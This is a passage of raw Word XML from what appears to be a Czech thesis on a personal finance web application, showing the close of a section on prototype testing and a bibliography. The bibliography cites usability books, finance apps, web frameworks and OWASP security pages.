      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>described</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> last </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>section</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. These </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>thoughts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>partially</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> feedback </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>participating</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> prototype </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>testing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
      <w:pPr>
        <w:pStyle w:val="Nadpis"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rStyle w:val="Pokec"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="268" w:name="_Toc37577735"/>
      <w:bookmarkStart w:id="269" w:name="_Toc88120446"/>
      <w:bookmarkStart w:id="270" w:name="_Toc88120683"/>
      <w:bookmarkStart w:id="271" w:name="_Toc88120895"/>
      <w:bookmarkStart w:id="272" w:name="_Toc88120999"/>
      <w:bookmarkStart w:id="273" w:name="_Toc88121042"/>
      <w:bookmarkStart w:id="274" w:name="_Toc88121179"/>
      <w:bookmarkStart w:id="275" w:name="_Toc88121553"/>
      <w:bookmarkStart w:id="276" w:name="_Toc88121610"/>
      <w:bookmarkStart w:id="277" w:name="_Toc88121748"/>
      <w:bookmarkStart w:id="278" w:name="_Toc88122014"/>
      <w:bookmarkStart w:id="279" w:name="_Toc88124619"/>
      <w:bookmarkStart w:id="280" w:name="_Toc88124656"/>
      <w:bookmarkStart w:id="281" w:name="_Toc88124806"/>
      <w:bookmarkStart w:id="282" w:name="_Toc88125789"/>
      <w:bookmarkStart w:id="283" w:name="_Toc88126309"/>
      <w:bookmarkStart w:id="284" w:name="_Toc88126460"/>
      <w:bookmarkStart w:id="285" w:name="_Toc88126527"/>
      <w:bookmarkStart w:id="286" w:name="_Toc88126556"/>
      <w:bookmarkStart w:id="287" w:name="_Toc88126772"/>
      <w:bookmarkStart w:id="288" w:name="_Toc88126862"/>
      <w:bookmarkStart w:id="289" w:name="_Toc88127103"/>
      <w:bookmarkStart w:id="290" w:name="_Toc88127146"/>
      <w:bookmarkStart w:id="291" w:name="_Toc88128511"/>
      <w:bookmarkStart w:id="292" w:name="_Toc107634153"/>
      <w:bookmarkStart w:id="293" w:name="_Toc107635188"/>
      <w:bookmarkStart w:id="294" w:name="_Toc107635228"/>
      <w:bookmarkStart w:id="295" w:name="_Toc107635245"/>
      <w:bookmarkStart w:id="296" w:name="_Toc387327903"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Seznam použité literatury</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rsidR="00956893" w:rsidRDefault="004D2639" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2639">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00595270">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:instrText xml:space="preserve"> BIBLIOGRAPHY  \l 1029 </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004D2639">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[1] STEM/MARK, A.S.. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Finanční gramotnost v ČR: Kvantitativní výzkum – Finanční gramotnost obyvatel ČR</w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2010, 88 s [cit. 2014-03-09]. Dostupné z: http://www.mfcr.cz/assets/cs/media/Odborne-vyzkumy_2010-12_Zaverecna-zprava-z-vyzkumu-plne-zneni-STEMMARK.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[2] KRUG, Steve. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Web design: nenuťte uživatele přemýšlet!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">. 2. aktualiz. vyd. Brno: Computer Press, 2006, 167 s. ISBN 80-251-1291-8. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[3] ŠPINAR, David. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Tvoříme přístupné webové stránky: připraveno s ohledem na novelu Zákona č. 365/2000 Sb., o informačních systémech veřejné správy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">. Vyd. 1. Brno: Zoner Press, 2004, 360 s. ISBN 80-868-1511-0. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[4] SVETLÍK, Slavomír. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>RQ Money</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2014 [cit. 2014-02-22]. Dostupné z: http://www.rq.sk/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[5] Google. My Budget Book. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Google Play</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2014 [cit. 2014-02-22]. Dostupné z: https://market.android.com/details?id=com.onetwoapps.mh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[6] LAŠ, Jan. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>eÚčty.cz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2014 [cit. 2014-03-15]. Dostupné z: http://eucty.cz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[7] Fresh Garden s.r.o.. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Moře financí</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2014 [cit. 2014-03-15]. Dostupné z: https://www.more-financi.cz/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[8] Toshl Inc.. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Toshl Finance: Personal Finance Manager and Expense Tracker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2014 [cit. 2014-03-22]. Dostupné z: https://toshl.com/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[9] OWASP Foundation Inc.. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2014 [cit. 2014-03-23]. Dostupné z: http://www.owasp.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[10] OWASP FOUNDATION INC.. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>OWASP Top 10 - 2013: The Ten Most Critical Web Application Security Risks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2013 [cit. 2013-11-11]. Dostupné z: http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[11] SQL Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2013 [cit. 2013-11-14]. Dostupné z: https://www.owasp.org/index.php/SQL_Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[12] Session hijacking attack. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2011 [cit. 2013-11-14]. Dostupné z: https://www.owasp.org/index.php/Session_hijacking_attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[13] Man-in-the-middle attack. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2009 [cit. 2014-03-23]. Dostupné z: https://www.owasp.org/index.php/Man-in-the-middle_attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[14] Cross-site Scripting (XSS). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2013 [cit. 2013-11-14]. Dostupné z: https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[15] Cross-Site Request Forgery (CSRF). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2013 [cit. 2013-11-14]. Dostupné z: https://www.owasp.org/index.php/CSRF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">[16] Evolus. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Pencil Project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2012 [cit. 2014-04-10]. Dostupné z: http://pencil.evolus.vn/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[17] NIELSEN, Jakob a Marie TAHIR. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Použitelnost domovských stránek</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">. Vyd. 1. Brno: Zoner Press, 2005, 323 s. ISBN 80-868-1518-8. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[18] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Bootstrap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2014 [cit. 2014-04-10]. Dostupné z: http://getbootstrap.com/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[19] MACDONALD, Matthew, Adam FREEMAN a Mario SZPUSZTA. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>ASP.NET 4 a C# 2010: tvorba dynamických stránek profesionálně</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">. Vyd. 1. Brno: Zoner Press, 2011, 880 s. ISBN 978-80-7413-131-8. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[20] SKEET, Jon. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>C# in depth: Second Edition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">. 2. Stamford, CT: Manning, 2011, 554 s. ISBN 19-351-8247-1. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[21] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>MSDN – Microsoft Developer Network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. Microsoft, 2014 [cit. 2014-02-02]. Dostupné z: http://msdn.microsoft.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[22] LACKO, Luboslav. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>SQL hotová řešení: k okamžitému použití</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">. Vyd. 1. Brno: Computer Press, 2003, 298 s. ISBN 80-722-6975-5. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[23] W3C. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2013 [cit. 2014-04-22]. Dostupné z: http://www.w3.org/TR/html5/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[24] CROFT, Jeff, Ian LLOYD a Dan RUBIN. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Mistrovství v CSS: pokročilé techniky pro webové designéry a vývojáře</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">. Vyd. 1. Brno: Computer Press, 2007, 409 s. ISBN 978-80-251-1705-7. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[25] DEVERIA, Alexis. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Can I use...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2014 [cit. 2014-04-22]. Dostupné z: http://caniuse.com/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[26] The jQuery Foundation. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2014 [cit. 2014-04-22]. Dostupné z: http://jquery.com/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[27] Google. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>AngularJS: Superheroic JavaScript MVW Framework</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2014 [cit. 2014-04-22]. Dostupné z: https://angularjs.org/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="00956893" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Normlnweb"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">[28] Google. Google Charts. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Google Developers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [online]. 2014 [cit. 2014-04-22]. Dostupné z: https://developers.google.com/chart/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="004D2639" w:rsidP="00956893">
      <w:pPr>
        <w:pStyle w:val="Literatura"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C2CD4" w:rsidRDefault="003C2CD4" w:rsidP="003C2CD4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
      <w:pPr>
        <w:pStyle w:val="Nadpis"/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:bookmarkStart w:id="297" w:name="_Toc37577736"/>
      <w:bookmarkStart w:id="298" w:name="_Toc88120447"/>
      <w:bookmarkStart w:id="299" w:name="_Toc88120684"/>
      <w:bookmarkStart w:id="300" w:name="_Toc88120896"/>
      <w:bookmarkStart w:id="301" w:name="_Toc88121000"/>
      <w:bookmarkStart w:id="302" w:name="_Toc88121043"/>
      <w:bookmarkStart w:id="303" w:name="_Toc88121180"/>
      <w:bookmarkStart w:id="304" w:name="_Toc88121554"/>
      <w:bookmarkStart w:id="305" w:name="_Toc88121611"/>
      <w:bookmarkStart w:id="306" w:name="_Toc88121749"/>
      <w:bookmarkStart w:id="307" w:name="_Toc88122015"/>
      <w:bookmarkStart w:id="308" w:name="_Toc88124620"/>
      <w:bookmarkStart w:id="309" w:name="_Toc88124657"/>
      <w:bookmarkStart w:id="310" w:name="_Toc88124807"/>
      <w:bookmarkStart w:id="311" w:name="_Toc88125790"/>
      <w:bookmarkStart w:id="312" w:name="_Toc88126310"/>
      <w:bookmarkStart w:id="313" w:name="_Toc88126461"/>
      <w:bookmarkStart w:id="314" w:name="_Toc88126528"/>
      <w:bookmarkStart w:id="315" w:name="_Toc88126557"/>
      <w:bookmarkStart w:id="316" w:name="_Toc88126773"/>
      <w:bookmarkStart w:id="317" w:name="_Toc88126863"/>
      <w:bookmarkStart w:id="318" w:name="_Toc88127104"/>
      <w:bookmarkStart w:id="319" w:name="_Toc88127147"/>
      <w:bookmarkStart w:id="320" w:name="_Toc88128512"/>
      <w:bookmarkStart w:id="321" w:name="_Toc107634154"/>
      <w:bookmarkStart w:id="322" w:name="_Toc107635189"/>
      <w:bookmarkStart w:id="323" w:name="_Toc107635229"/>
      <w:bookmarkStart w:id="324" w:name="_Toc107635246"/>
      <w:bookmarkStart w:id="325" w:name="_Toc387327904"/>
      <w:r>
        <w:lastRenderedPageBreak/>
